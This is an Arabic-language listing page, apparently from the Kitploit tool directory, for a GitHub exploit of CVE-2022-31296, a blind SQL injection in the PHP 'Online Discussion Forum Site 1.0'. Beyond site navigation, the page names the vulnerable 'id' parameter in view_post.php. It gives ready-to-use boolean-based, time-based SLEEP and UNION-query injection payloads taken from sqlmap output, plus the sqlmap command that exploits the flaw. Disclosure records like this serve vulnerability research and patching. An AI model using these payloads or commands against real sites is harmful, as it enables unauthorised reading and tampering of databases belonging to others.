Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-31296 — موقع منتدى النقاش عبر الإنترنت 1.0 - حقن SQL الأعمى | Kitploit
أدوات/GitHubGitHub/bigzooooz/cve-2022-31296
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubbigzooooz/cve-2022-31296

CVE-2022-31296

موقع منتدى النقاش عبر الإنترنت 1.0 - حقن SQL الأعمى

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-31296

Online Discussion Forum Site 1.0 - حقن SQL الأعمى

عنوان الاستغلال: Online Discussion Forum Site 1.0 - حقن SQL الأعمى

التاريخ: 2022-06-13

CVE: CVE-2022-31296

مؤلف الاستغلال: Abdulaziz Saad (@b4zb0z)

الصفحة الرئيسية للمورد: https://www.sourcecodester.com/

رابط البرنامج:

https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

الإصدار: 1.0

تم اختباره على: LAMP, Ubuntu


[#] موقع الثغرة: $_GET['id'] في /odfs/posts/view_post.php:3

root@kitploit:~
المعامل: id (GET)
root@kitploit:~
النوع: boolean-based blind
العنوان: AND boolean-based blind - WHERE or HAVING clause
الحمولة: p=posts/view_post&id=1' AND 8036=8036 AND 'zhKq'='zhKq
root@kitploit:~
النوع: time-based blind
root@kitploit:~
العنوان: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
الحمولة: p=posts/view_post&id=1' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Tmcg) AND 'qyDN'='qyDN
root@kitploit:~
النوع: UNION query
root@kitploit:~
العنوان: Generic UNION query (NULL) - 12 columns
الحمولة: p=posts/view_post&id=-5399' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767671,0x5a7272534b4b78734a53464e62454b52617876484e6670665570454454526a6963626f506e45776e,0x717a707671)-- -

[#] الاستغلال باستخدام SQLMAP: sqlmap -u "http://localhost/odfs/?p=posts/view_post&id=1" --dbms=mysql

تنزيل الأداة